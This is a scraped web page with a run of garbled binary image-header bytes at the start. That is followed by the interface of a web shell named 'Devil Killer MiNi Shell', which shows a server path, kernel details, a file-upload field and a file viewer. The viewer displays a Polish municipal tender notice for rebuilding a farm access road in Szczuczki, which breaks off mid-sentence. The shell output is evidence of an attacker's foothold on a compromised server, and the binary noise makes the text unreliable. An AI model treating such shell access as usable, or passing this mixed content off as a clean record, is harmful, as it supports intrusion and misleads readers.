JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240529/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240529/0034428401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Modernizacja (przebudowa) drogi dojazdowej do gruntów rolnych w miejscowości Szczuczki&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wojciechów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431020180</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojciechów 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wojciechów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">24-204</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(81) 51 77 241</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@wojciechow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wojciechow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Modernizacja (przebudowa) drogi dojazdowej do gruntów rolnych w miejscowości Szczuczki&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-20f4b365-1d88-11ef-a7c1-72acb4a2af8f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00344284</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00098319/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Modernizacja (przebudowa) drogi dojazdowej do gruntów rolnych w m. Szczuczki (dz. nr 254)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzp.wojciechow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem bezpłatnej Platformy Zamówień<br/>Publicznych ZETOPZP dostępnej pod adresem https://pzp.wojciechow.pl.<br/>Szczegółowe informacje na ten temat dostępne są w Rozdziale 11 SWZ. https://pzp.wojciechow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy<br/>przekazują za pośrednictwem Platformy Zamówień Publicznych ZETOPZP:<br/>https://pzp.wojciechow.pl. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>założyć konto na Platformie Zamówień Publicznych ZETOPZP: https://pzp.wojciechow.pl/#/authentication/register gdzie zostanie<br/>powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. 2.Wykonawca przystępując do postępowania o<br/>udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując w przypadku posiadania konta w Platformie Zamówień<br/>Publicznych ZETOPZP, akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie<br/>internetowej https://pzp.wojciechow.pl oraz uznaje go za wiążący. 3.Zamawiający, zgodnie z art. 67 Ustawy z dnia 11 września<br/>2019r. – Prawo zamówień publicznych określa następujące wymagania techniczne i organizacyjne sporządzania, wysyłania i<br/>odbierania korespondencji elektronicznej przy wykorzystaniu Platformy tj.: a) stały dostęp do<br/>sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; b) komputer klasy PC lub MAC, o następującej<br/>konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 10, Mac Os x 10.4,<br/>Linux, lub ich nowsze wersje;<br/>c) zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z wyjątkiem Internet<br/>Explorer;<br/>d)włączona obsługa JavaScript; e)zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie pdf.; f)podłączony<br/>lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Wykonawcę. 4.a)<br/>dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w formatach: .pdf, .doc, .docx, .xls,<br/>.xlsx,.zip,.rar,.7zip,.jpg, .jpeg, .png, .txt, .tiff, .xades, .sig oraz innych formatach plików określonych w przepisach wydanych na<br/>podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z<br/>2024 r. poz. 307 z późn. zm.), z wyjątkiem formatów wykonywalnych (takich jak np. EXE, COM, DLL, BAT). b)informacje na temat<br/>kodowania i czasu odbioru<br/>danych: - plik załączony przez Wykonawcę na Platformie Zamówień Publicznych ZETOPZP i zapisany, widoczny jest w Systemie,<br/>jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert.<br/>5.Zasady składania ofert oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania<br/>opisane zostały w Instrukcji użytkownika, Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w niej<br/>wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę akceptuje zasady korzystania z<br/>Platformy wskazane w Instrukcji użytkownika i SWZ. 6.Sporządzenie i przekazywanie informacji w tym dokumentów elektronicznych<br/>musi być zgodne z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. 7.Oznaczenie czasu odbioru danych<br/>przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu platformy Microsoft Azure, który jest<br/>synchronizowany ze znacznikiem czasu UTC. Dalsze informacje i wskazówki zawarto w SWZ Rozdział 11.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym;<br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ust. 3 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605<br/>ze zm.), dalej „ustawa Pzp”;<br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza<br/>integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego<br/>danych osobowych narusza przepisy RODO;<br/>8) Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa<br/>w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">INR.271.10.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia jest robota budowlana na zadaniu inwestycyjnym pn. „Modernizacja (przebudowa) drogi dojazdowej do gruntów rolnych w miejscowości Szczuczki”. Zadanie obejmuje przebudowę drogi wewnętrznej w miejscowości Szczuczki na odcinku 500 m (dz. nr ewid. 254 obręb Szczuczki VI Kolonia), gm. Wojciechów, powiat lubelski. <br/>4.2.	Przedmiotem zamówienia jest wykonanie robót budowlanych dotyczących przebudowy drogi wewnętrznej w miejscowości Szczuczki na odcinku 500 m, na działce nr ewid. 254 obręb Szczuczki VI Kolonia, gmina Wojciechów, w zakres których wchodzi m.in.<br/>- wycinkę krzewów - roboty rozbiórkowe (w tym rozbiórkę istniejącej nawierzchni drogi wewnętrznej z kruszywa, nawierzchni istniejącego chodnika w celu dowiązania wysokościowego do projektowanych rozwiązań) - wykonanie robót ziemnych, w tym wykopów i nasypów związanych z formowaniem korpusu drogowego drogi gminnej wewnętrznej - przebudowę nawierzchni drogi gminnej wewnętrznej o szerokości jezdni 3,0 m w technologii warstw bitumicznych - wykonanie w ciągu drogi gminnej wewnętrznej poboczy umocnionych kruszywem łamanym stabilizowanym mechanicznie grubości 15 cm na szerokości 0,50 m - przebudowę istniejącego zjazdu z drogi powiatowej nr 2237L na działkę nr 254 w granicach pasa drogowego DP 2237L o parametrach zjazdu indywidualnego tj. o szerokości jezdni zjazdu 3,0 m (bez uwzględnienia wyokrągleń) z obustronnymi poboczami o szerokości 0,75 m (pobocza umocnione kruszywem łamanym stabilizowanym mechanicznie grubości 15 cm) wraz z wykonaniem nowej konstrukcji nawierzchni zjazdu w technologii warstw bitumicznych - wykonanie nawierzchni chodnika z betonowej kostki brukowej w dowiązaniu do istniejącego chodnika - regulację wysokościową nawierzchni istniejącego zjazdu z płytek betonowych - remont istniejącego przepustu pod zjazdem z drogi powiatowej nr 2237L na drogę gminną wewnętrzną polegający na wymianie elementów przelotowych na rury PP SN16 Ø60 cm długości L=9,0 m - odtworzenie (renowację) istniejącego rowu w ciągu drogi powiatowej nr 2237L wraz z profilowaniem skarp i dna rowu na długości 11,8 m po stronie lewej drogi gminnej wewnętrznej oraz na długości 4,0 m po stronie prawej drogi gminnej wewnętrznej - regulację wysokościową zasuwy gazowej - umocnienie skarp poprzez humusowanie i obsianie mieszanką traw - wykonanie nowego oznakowania pionowego. Powyższy zakres doprecyzowany jest dokumentacją projektową wskazaną w pkt. 4.4. SWZ.<br/>W ramach przedmiotu zamówienia Wykonawca:<br/>1)	wykona roboty budowlane w zakresie „Modernizacji (przebudowy) drogi dojazdowej do gruntów rolnych w miejscowości Szczuczki”, zgodnie z dokumentacją projektową i STWiOR,<br/>2)	dostarczy materiały i urządzenia niezbędne do wykonania robót,<br/>3)	będzie uczestniczyć w czynnościach odbiorowych inwestycji,<br/>4)	przygotuje obiekt do eksploatacji – roboty porządkowe<br/>5)	zapewni obsługę geodezyjną inwestycji w tym dokona inwentaryzacji powykonawczej geodezyjnej,<br/>6)	przygotuje i zatwierdzi projekty czasowej organizacji ruchu,<br/>7)	przygotuje wymagane dokumenty odbiorowe. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45112210-0 - Usuwanie wierzchniej warstwy gleby</p> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert,<br/>przyjmując zasadę, że 1% = 1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na wykonane roboty budowlane oraz wbudowane materiały i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej w zakresie: <br/>Wykonawca winien wykazać, że wykonał należycie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, minimum 1 robotę budowlaną, która polegała na budowie/lub przebudowie/lub rozbudowie/lub modernizacji drogi obejmującej swym zakresem wykonanie nawierzchni asfaltowej o długości minimum 300 m. <br/><br/>DODATKOWE INFORMACJE DOTYCZĄCE WARUNKÓW UDZIAŁU W POSTĘPOWANIU:<br/>1) Wykonawca powinien w wykazie robót wyraźnie określić zakres i rodzaj robót, aby można było ustalić, czy spełnia warunek udziału w postępowaniu. <br/>2) Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiającego będą przeliczane wg średniego kursu NBP na dzień publikacji ogłoszenia.<br/>3) Zgodnie z orzeczeniem TSUE C-387/14 (ESAPROJEKT)/odpowiedź na pytanie czwarte/ Zamawiający wskazuje, że w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub w przypadku korzystania z podmiotów udostępniających zasoby na podstawie art. 118 ustawy Pzp Wykonawca lub minimum jeden Wykonawca wspólnie ubiegający się o zamówienie lub minimum jeden podmiot udostępniający zasoby musi posiadać pełne doświadczenie wskazane w warunku udziału w postępowaniu wskazane w pkt 6.1.4. SWZ – dotyczy to konieczności wykazania doświadczenia wynikającego z powtarzalności wykonanych robót tj. wykonania minimum 1 roboty budowlanej przez jeden podmiot.<br/>4) Przez „budowę” rozumie się wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego zgodnie z definicją ustawy Prawo Budowlane.<br/>5) Przez „przebudowę” rozumie się wykonywanie robót budowlanych, w wyniku których następuje zmiana parametrów użytkowych lub technicznych istniejącego obiektu budowlanego, z wyjątkiem charakterystycznych parametrów, jak: kubatura, powierzchnia zabudowy, wysokość, długość, szerokość bądź liczba kondygnacji; w przypadku dróg są dopuszczalne zmiany charakterystycznych parametrów w zakresie niewymagającym zmiany granic pasa drogowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu: Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków<br/>dowodowych w tym zakresie.<br/>Zamawiający informuje, że wykluczeniu z postępowania o udzielenie 